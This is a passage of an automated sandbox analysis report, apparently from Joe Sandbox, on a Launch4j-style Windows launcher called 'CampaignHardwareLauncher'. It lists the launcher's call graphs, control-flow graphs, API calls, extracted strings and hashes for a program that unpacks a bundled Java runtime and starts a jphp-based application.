                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                                                                                                                                                                • Disassembly available
                                                                                                                                                                                                                                                                                                                callgraph 0 Function_00404040 97 Function_00402CB0 0->97 1 Function_00404740 37 Function_00403D20 1->37 96 Function_004042B0 1->96 1->97 2 Function_00401149 3 Function_0040124A 31 Function_00406A10 3->31 48 Function_00406B30 3->48 4 Function_0040334C 100 Function_004023B0 4->100 5 Function_00402E4E 5->97 6 Function_00402E50 6->97 7 Function_00401E50 8 Function_00401150 17 Function_00406B60 8->17 8->31 8->48 9 Function_00403659 10 Function_00406859 11 Function_00401959 12 Function_00405B5E 13 Function_00401E60 14 Function_00401960 15 Function_00406860 22 Function_00406C70 15->22 16 Function_00405B60 16->22 18 Function_00404069 18->97 19 Function_00401269 19->8 20 Function_00401270 20->8 21 Function_00406B70 23 Function_00403071 24 Function_00403B77 25 Function_0040397E 26 Function_00406C00 98 Function_004012B0 26->98 27 Function_00401000 27->17 28 Function_00406A00 29 Function_00403100 29->22 29->100 30 Function_00403700 72 Function_004033F0 30->72 31->22 31->26 95 Function_004013B0 31->95 32 Function_00401C10 33 Function_00405010 33->22 34 Function_00403D17 35 Function_0040261C 36 Function_0040291C 37->22 37->29 84 Function_00402690 37->84 38 Function_00402620 39 Function_00401B20 40 Function_00402920 92 Function_004027A0 40->92 41 Function_00402829 41->84 42 Function_00401C2C 43 Function_0040682C 44 Function_00405D2C 45 Function_00405D30 45->1 45->16 45->22 45->29 46 Function_00401C30 45->46 63 Function_004051E0 45->63 45->72 82 Function_00405390 45->82 83 Function_00403790 45->83 46->22 47 Function_00406830 49 Function_00402531 50 Function_004020C0 51 Function_00401DC5 52 Function_004030CC 53 Function_00401FCC 54 Function_00406ACE 54->95 55 Function_00401DD0 56 Function_004030D0 57 Function_00401ED0 58 Function_004012D0 58->50 59 Function_004050D0 59->22 60 Function_00405CDC 61 Function_004052DE 61->29 62 Function_00402EDE 62->97 63->22 63->29 64 Function_004019E0 64->57 65 Function_00402EE0 65->97 66 Function_004025E0 67 Function_004069E0 68 Function_004033E5 69 Function_00406CE9 70 Function_004013E9 70->15 70->32 70->47 70->50 70->57 93 Function_004021A0 70->93 71 Function_00402BEC 91 Function_00406CA0 72->91 73 Function_004069F0 74 Function_004039F1 75 Function_00406BF9 76 Function_00401AFC 77 Function_00401B87 78 Function_00405387 79 Function_00403789 80 Function_0040268C 81 Function_0040398E 82->22 82->29 85 Function_00401290 85->8 86 Function_00402199 87 Function_00402799 88 Function_00406B99 88->98 89 Function_00406A9C 89->95 90 Function_00406BA0 90->98 92->84 94 Function_004042A7 95->15 95->32 95->45 95->47 95->50 95->57 95->93 97->40 99 Function_004022B0 101 Function_004020B9 102 Function_004012BC

                                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                                Function 00405D30 Relevance: 163.4, APIs: 70, Strings: 23, Instructions: 688librarystringloaderCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 0 405d30-405d5e call 406c70 GetModuleHandleA 3 405d70-405df2 memset GetModuleFileNameA 0->3 4 405d60-405d6e 0->4 5 406350-406360 3->5 6 405df8-405e16 strrchr 3->6 6->5 7 405e1c-405e39 call 401c30 6->7 7->4 10 405e3f-405e66 GetModuleHandleA GetProcAddress 7->10 11 405e68-405e7b GetCurrentProcess 10->11 12 405e7e-405e85 10->12 11->12 13 405eb0-405edd FindResourceExA 12->13 14 405e87-405e94 12->14 18 405ee3-405efa LoadResource 13->18 19 40638b-40639e SetLastError 13->19 16 405e96 14->16 17 405e9b-405eab fprintf 14->17 16->17 17->13 20 405f35-405f62 FindResourceExA 18->20 21 405efc-405f0b LockResource 18->21 22 4063a6-4063b9 SetLastError 19->22 20->22 23 405f68-405f7f LoadResource 20->23 21->20 24 405f0d 21->24 32 4063c1-4063d4 SetLastError 22->32 25 405f81-405f90 LockResource 23->25 26 405fba-405fe7 FindResourceExA 23->26 27 405f0f-405f1c 24->27 25->26 28 405f92 25->28 29 406361-406374 SetLastError 26->29 30 405fed-406004 LoadResource 26->30 27->27 31 405f1e-405f26 27->31 33 405f94-405fa1 28->33 34 406377-40637e 29->34 30->34 35 40600a-406019 LockResource 30->35 31->20 36 405f28-405f2f 31->36 37 4063dc-4063ef SetLastError 32->37 33->33 38 405fa3-405fab 33->38 34->5 40 406380-406389 34->40 35->34 39 40601f 35->39 36->20 41 40641f-406442 fprintf 36->41 45 4063f7-40641a fprintf 37->45 38->26 42 405fad-405fb4 38->42 43 406021-40602e 39->43 44 406335-406349 fprintf 40->44 41->20 42->26 46 406447-40646a fprintf 42->46 43->43 47 406030-406038 43->47 44->5 48 406047-406091 memset FindResourceExA 45->48 46->26 47->48 49 40603a-406041 47->49 48->32 50 406097-4060ae LoadResource 48->50 49->45 49->48 51 4060b0-4060bf LockResource 50->51 52 4060e6-4060ed 50->52 51->52 53 4060c1 51->53 54 406138-4061b7 memset * 2 GetCurrentDirectoryA FindResourceExA 52->54 55 4060ef-406132 CreateMutexA GetLastError 52->55 56 4060c3-4060cd 53->56 54->37 58 4061bd-4061d4 LoadResource 54->58 55->54 57 40646f-406476 55->57 56->56 59 4060cf-4060d7 56->59 60 406482-4064a1 fprintf 57->60 61 406478-40647d 57->61 62 406266-40627c call 404740 58->62 63 4061da-4061e9 LockResource 58->63 59->52 65 4060d9-4060e0 59->65 60->4 61->4 62->4 70 406282-40631d memset strcpy strlen memset GetEnvironmentVariableA strlen 62->70 63->62 66 4061eb 63->66 65->52 68 406796-4067b4 fprintf 65->68 69 4061ed-4061fb 66->69 68->52 69->69 71 4061fd-406205 69->71 72 4064c0-4064fc strlen strcat SetEnvironmentVariableA 70->72 73 406323-40632a 70->73 74 406214-406237 strncpy strlen 71->74 75 406207-40620e 71->75 72->73 77 406502-406555 call 4051e0 FindResourceExA 72->77 73->5 76 40632c-406331 73->76 79 406239 74->79 80 40623f-406260 strcat _chdir 74->80 75->74 78 4067b9-4067dd fprintf 75->78 76->44 84 406811-406824 SetLastError 77->84 85 40655b-406572 LoadResource 77->85 78->74 79->80 80->62 81 4064a6-4064bb fprintf 80->81 81->62 86 4065c4-4065d9 atoi 85->86 87 406574-406583 LockResource 85->87 89 4067e2-4067f5 strlen 86->89 90 4065df-4065f2 strlen 86->90 87->86 88 406585 87->88 91 406587-406591 88->91 94 406803-406808 89->94 95 4067f7-4067fc 89->95 92 406600-406701 strcat GlobalMemoryStatusEx call 4033f0 * 2 memset call 403790 call 403100 call 405390 90->92 93 4065f4-4065f9 90->93 91->91 96 406593-40659b 91->96 108 406706-406718 call 405b60 92->108 93->92 94->84 95->94 96->86 98 40659d-4065a4 96->98 98->86 100 4065a6-4065bf fprintf 98->100 100->86 111 406724-406745 fprintf 108->111 112 40671a-40671f 108->112 111->112 113 406747-406769 fprintf 111->113 112->4 113->112 114 40676b-406791 strlen fprintf 113->114 114->4
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ModuleResource$Handle$AddressCurrentFileFindLoadLockNameProcProcessfprintfmemsetstrrchr
                                                                                                                                                                                                                                                                                                                • String ID: -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd$-Xms$-Xmx$An error occurred while starting the application.$Args length:%d/32768 chars$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe$Error:%s$Instance already exists.$IsWow64Process$Laun$Launcher args:%s$Launcher:%s$Resource %d:%s$Startup error message not defined.$WOW64:%s$Working dir:%s$\bin$appendToPathVar failed.$bin\java.exe$bin\javaw.exe$ch4j$yes
                                                                                                                                                                                                                                                                                                                • API String ID: 919401838-1088111942
                                                                                                                                                                                                                                                                                                                • Opcode ID: e98f0b280fdfade851ebe13318b98efc7c14c0c3f0ba294e535c625494688a31
                                                                                                                                                                                                                                                                                                                • Instruction ID: bf9eff1d8a15de45e5a137a0cf06cc9be9fda6a92e4b939ea636d94b2118cc52
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e98f0b280fdfade851ebe13318b98efc7c14c0c3f0ba294e535c625494688a31
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A521EB09087018BD714EF29D58025EBBE1EF84344F15C87FE889AB391DB7C89658F4A
                                                                                                                                                                                                                                                                                                                Function 00404740 Relevance: 84.6, APIs: 43, Strings: 5, Instructions: 553stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 185 404740-404794 FindResourceExA 186 40479a-4047b1 LoadResource 185->186 187 404c7b-404c8b SetLastError 185->187 188 404810-404859 FindResourceExA 186->188 189 4047b3-4047c2 LockResource 186->189 193 404c93-404ca6 SetLastError 187->193 190 404cae-404cc1 SetLastError 188->190 191 40485f-404876 LoadResource 188->191 189->188 192 4047c4-4047c9 189->192 197 404cc9-404ce0 call 402cb0 190->197 194 4048e0-4048f7 strchr 191->194 195 404878-404887 LockResource 191->195 196 4047d0-4047da 192->196 193->190 199 4048f9-404907 strlen 194->199 200 40490d-40491d strcpy 194->200 195->194 198 404889-40488c 195->198 196->196 201 4047dc-4047e4 196->201 211 404ce6-404cee 197->211 212 404f7d-404f92 call 402cb0 197->212 203 404890-40489d 198->203 199->200 204 404afc-404b4c strncpy strlen strcat 199->204 205 404922-404950 FindResourceExA 200->205 201->188 206 4047e6-4047ed 201->206 203->203 209 40489f-4048a7 203->209 204->205 205->193 210 404956-40496c LoadResource 205->210 206->188 207 4047ef-40480d fprintf 206->207 207->188 209->194 213 4048a9-4048b0 209->213 214 4049e0-4049f7 strchr 210->214 215 40496e-40497d LockResource 210->215 217 404cf4-404d10 strcpy 211->217 218 404a39-404a53 call 403d20 211->218 237 404f97-404fae call 402cb0 212->237 213->194 221 4048b2-4048d9 fprintf 213->221 219 4049f9-404a07 strlen 214->219 220 404a0d-404a1d strcpy 214->220 215->214 222 40497f-404981 215->222 225 404a55-404a5f 217->225 226 404d16-404d22 217->226 218->225 239 404a97-404aa6 call 4042b0 218->239 219->220 227 404aa7-404af7 strncpy strlen strcat 219->227 228 404a22-404a2a 220->228 221->194 223 404990-40499d 222->223 223->223 230 40499f-4049a7 223->230 231 404d24 226->231 232 404d29-404d47 fprintf 226->232 227->228 233 404a60-404a6d call 403d20 228->233 234 404a2c-404a33 228->234 230->214 236 4049a9-4049b0 230->236 231->232 232->225 246 404a72-404a74 233->246 234->218 238 404b51-404b8f FindResourceExA 234->238 236->214 241 4049b2-4049d9 fprintf 236->241 254 404fb4-404fc0 237->254 255 404e97-404e9f 237->255 244 404f33-404f43 SetLastError 238->244 245 404b95-404bac LoadResource 238->245 241->214 257 404f4b-404f62 call 402cb0 244->257 250 404bea-404bfa atoi 245->250 251 404bae-404bbd LockResource 245->251 246->225 247 404a76-404a84 246->247 252 404a8a-404a95 247->252 253 404d7e-404dbb FindResourceExA 247->253 258 404c00-404c18 call 402cb0 250->258 259 404d4c-404d63 call 402cb0 250->259 251->250 256 404bbf-404bc1 251->256 252->225 252->239 264 404dc1-404dd8 LoadResource 253->264 265 404fc9-404fd9 SetLastError 253->265 254->265 255->252 260 404ea5-404ec1 strcpy 255->260 262 404bd0-404bda 256->262 275 404e55-404e5d 257->275 276 404f68-404f74 257->276 278 404c1a-404c2a call 402cb0 258->278 279 404c2f-404c37 258->279 259->279 283 404d69-404d75 259->283 270 404ec3-404ecf 260->270 271 404ef4-404efb 260->271 262->262 273 404bdc-404be4 262->273 267 404e10-404e20 atoi 264->267 268 404dda-404de9 LockResource 264->268 285 404fe1-404fff fprintf 265->285 267->257 282 404e26-404e3e call 402cb0 267->282 268->267 277 404deb 268->277 280 404ed1 270->280 281 404ed6-404eef fprintf 270->281 284 404f03-404f0a 271->284 273->250 273->284 275->260 291 404e5f-404e62 275->291 276->212 286 404ded-404df7 277->286 278->279 279->217 288 404c3d-404c40 279->288 280->281 281->271 282->275 298 404e40-404e50 call 402cb0 282->298 283->253 284->250 290 404f10-404f2e fprintf 284->290 285->267 286->286 292 404df9-404e01 286->292 288->197 293 404c46-404c5e call 402cb0 288->293 290->250 291->237 295 404e68-404e80 call 402cb0 291->295 292->267 296 404e03-404e0a 292->296 293->211 304 404c64-404c79 call 402cb0 293->304 295->255 303 404e82-404e92 call 402cb0 295->303 296->267 296->285 298->275 303->255 304->211
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLock$fprintf$ErrorLaststrchrstrcpystrlen
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe$Resource %d:%s$Runtime used:%s (%s-bit)$true
                                                                                                                                                                                                                                                                                                                • API String ID: 1095060389-161049339
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1e1ebbd2596e796659a365ff710677ee0d78a079d6b67fc0678fadb0c843e369
                                                                                                                                                                                                                                                                                                                • Instruction ID: 877def55760d6699fa8b0a675f498fd38e355f95ffd6f34839a3e279e3ce58b8
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e1ebbd2596e796659a365ff710677ee0d78a079d6b67fc0678fadb0c843e369
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70225DB4A083019BD700AF65D64435FBBE1AB84344F01C87FE989AB3C2D77C9955DB8A
                                                                                                                                                                                                                                                                                                                Function 004013B0 Relevance: 58.1, APIs: 27, Strings: 6, Instructions: 365stringtimewindowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 308 4013b0-4013cc call 405d30 311 4013d2-4013d3 308->311 312 40185b-40188a memset call 4020c0 308->312 313 4013f0-401400 call 4021a0 311->313 314 4013d5-4013da call 401ed0 311->314 321 4018bc-4018e1 FindWindowExA 312->321 322 40188c 312->322 324 401402-401415 strstr 313->324 325 40141b-401436 call 4021a0 313->325 326 4013df-4013e6 314->326 321->322 323 4018e3 321->323 327 40188e-4018b2 ShowWindow SetForegroundWindow call 401c10 322->327 329 4018e9-40190f GetWindowTextA strstr 323->329 324->325 330 40180d-401812 324->330 336 4015e9-4015f7 call 4021a0 325->336 337 40143c 325->337 327->321 329->327 333 401915-401938 FindWindowExA 329->333 330->325 333->329 335 40193a 333->335 335->322 339 401441-40144e 336->339 346 4015fd-401610 strstr 336->346 337->339 340 401450-401452 339->340 341 401458-4014c6 CreateWindowExA 339->341 340->341 343 4017e6-4017e8 340->343 344 40161b-401644 call 4020c0 341->344 345 4014cc-4014d4 341->345 348 4014d6-401504 SetTimer 343->348 351 4017ee 343->351 355 401646-401657 atoi 344->355 356 401668-401688 call 4021a0 344->356 345->348 349 40150a-40151a call 406860 345->349 346->339 350 401616 346->350 348->314 348->349 357 40151f-401521 349->357 350->344 354 4017f3-4017fa 351->354 358 401837-401859 fwrite 354->358 359 4017fc-401808 call 406830 call 401c10 354->359 360 40165d-401662 355->360 361 40193f-401944 355->361 369 4016a3-4016ee call 4021a0 LoadImageA 356->369 370 40168a-40169d strstr 356->370 357->314 363 401527-40152f 357->363 358->359 359->326 360->356 361->356 366 401531-401539 363->366 367 40153f-401545 363->367 366->354 366->367 371 40155d-40157c GetMessageA 367->371 369->314 382 4016f4-4017de SendMessageA GetWindowRect GetSystemMetrics * 2 SetWindowPos ShowWindow UpdateWindow 369->382 370->369 373 401949-40194e 370->373 375 401547-40155a TranslateMessage DispatchMessageA 371->375 376 40157e-401586 371->376 373->369 375->371 379 4015b0-4015bc call 406830 376->379 380 401588-40158f 376->380 387 4015cc-4015d4 379->387 388 4015be-4015c6 379->388 380->379 383 401591-401599 380->383 385 4017e1 382->385 383->379 386 40159b-4015ab fprintf 383->386 385->343 386->379 389 401817-40182d fprintf 387->389 390 4015da-4015e4 call 401c10 387->390 388->385 388->387 389->358 390->326
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405D30: GetModuleHandleA.KERNEL32(?,004013C7), ref: 00405D4D
                                                                                                                                                                                                                                                                                                                • strstr.MSVCRT ref: 0040140E
                                                                                                                                                                                                                                                                                                                • CreateWindowExA.USER32 ref: 004014B1
                                                                                                                                                                                                                                                                                                                • SetTimer.USER32 ref: 004014FA
                                                                                                                                                                                                                                                                                                                • GetMessageA.USER32 ref: 00401572
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401ED0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004013DA), ref: 00401ED7
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401ED0: puts.MSVCRT ref: 00401F11
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401ED0: ShellExecuteA.SHELL32 ref: 00401F5A
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00401873
                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32 ref: 0040189A
                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32 ref: 004018A5
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$CreateErrorExecuteForegroundHandleLastMessageModuleShellShowTimermemsetputsstrstr
                                                                                                                                                                                                                                                                                                                • String ID: --l4j-dont-wait$--l4j-no-splash$--l4j-no-splash-err$Exit code:%d$Exit code:%d, restarting the application!$STATIC
                                                                                                                                                                                                                                                                                                                • API String ID: 2862500452-2488410787
                                                                                                                                                                                                                                                                                                                • Opcode ID: ef69a45fb9a8d98a3e7d4beaa163ba7c94590803dc5b94dc991fefc783aab643
                                                                                                                                                                                                                                                                                                                • Instruction ID: 24b147bc9a002fea4a62b88368d981a48f0c15b8e85cb8378e8374e035e88a4e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef69a45fb9a8d98a3e7d4beaa163ba7c94590803dc5b94dc991fefc783aab643
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBE14CB19083018BD714EF3AD54131BBAE5AF84344F01C93FE989A73A1DB78D8519B8B
                                                                                                                                                                                                                                                                                                                Function 00401150 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3695137517-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 60854d5bb89194ddad18fca627b3fed1a2910dcd429b76d8ba96fdf7a2bac1dc
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9b036dcc62e5206002a8964a93b809c6819fe7ae1a2a78e05521c6610f765c41
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60854d5bb89194ddad18fca627b3fed1a2910dcd429b76d8ba96fdf7a2bac1dc
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34212AB4A053048FC704FF65D58161ABBF5BF88344F01C93EE895A73A6DB389850CB5A
                                                                                                                                                                                                                                                                                                                Function 00405390 Relevance: 121.2, APIs: 58, Strings: 11, Instructions: 479stringfileCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 115 405390-40545e call 406c70 memset * 4 FindResourceExA 118 405464-40547b LoadResource 115->118 119 405a9e-405ab1 SetLastError 115->119 120 4054cd-405517 FindResourceExA 118->120 121 40547d-40548c LockResource 118->121 122 405ab9-405ad3 strcat strlen 119->122 124 405a83-405a96 SetLastError 120->124 125 40551d-405533 LoadResource 120->125 121->120 123 40548e 121->123 126 405ad8-405add 122->126 127 405490-40549a 123->127 124->119 128 405535-405544 LockResource 125->128 129 405597-4055c4 FindResourceExA 125->129 136 405ae9-405b0b strcat strlen 126->136 127->127 132 40549c-4054a4 127->132 128->129 133 405546-405549 128->133 130 4058e6-4058f9 SetLastError 129->130 131 4055ca-4055e1 LoadResource 129->131 134 4058fc-4058fe 130->134 131->134 135 4055e7-4055f6 LockResource 131->135 132->120 137 4054a6-4054ad 132->137 138 405550-40555e 133->138 139 405900-405942 strlen strcat strlen 134->139 140 40595b-4059a9 strlen strncat strlen 134->140 135->134 141 4055fc-4055fe 135->141 136->126 137->120 142 4054af-4054c8 fprintf 137->142 138->138 143 405560-405568 138->143 144 405947-40595a 139->144 146 4059b7-4059d9 strcat strlen 140->146 147 4059ab-4059b0 140->147 145 405600-40560d 141->145 142->120 143->129 148 40556a-405571 143->148 145->145 150 40560f-405617 145->150 146->144 147->146 148->129 149 405573-405592 fprintf 148->149 149->129 151 405626-405653 FindResourceExA 150->151 152 405619-405620 150->152 154 405a39-405a4c SetLastError 151->154 155 405659-405670 LoadResource 151->155 152->151 153 405b0d-405b30 fprintf 152->153 153->151 157 405a4f-405a56 154->157 156 405676-405685 LockResource 155->156 155->157 156->157 158 40568b 156->158 159 4056b4-405713 call 403100 strlen 157->159 160 405a5c-405a7e fwrite 157->160 162 40568d-40569b 158->162 159->122 165 405719-405720 159->165 160->159 162->162 164 40569d-4056a5 162->164 164->159 166 4056a7-4056ae 164->166 165->136 167 405726-405741 strtok 165->167 166->159 168 405b35-405b59 fprintf 166->168 169 405897-4058e5 strlen * 2 strcat 167->169 170 405747-405749 167->170 168->159 171 405750-405757 170->171 172 40575d-405770 strpbrk 171->172 173 4059de-405a06 fprintf strpbrk 171->173 174 405776-40578b strrchr 172->174 175 405a0c-405a34 strcat strlen 172->175 173->174 173->175 176 405792-4057d2 strncpy _findfirst 174->176 177 40578d-40578f 174->177 178 405878-405891 strtok 175->178 179 405870-405873 _findclose 176->179 180 4057d8-4057de 176->180 177->176 178->169 178->171 179->178 181 4057f6-405837 strcpy strcat strlen 180->181 182 4057e0-4057f4 _findnext 181->182 183 405839-405868 fprintf _findnext 181->183 182->179 182->181 183->181 184 40586a 183->184 184->179
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$strlen$strcat$ErrorFindLastLoadLockfprintfmemset$_findnextstrpbrkstrtok$_findclose_findfirstfwritestrcpystrncatstrncpystrrchr
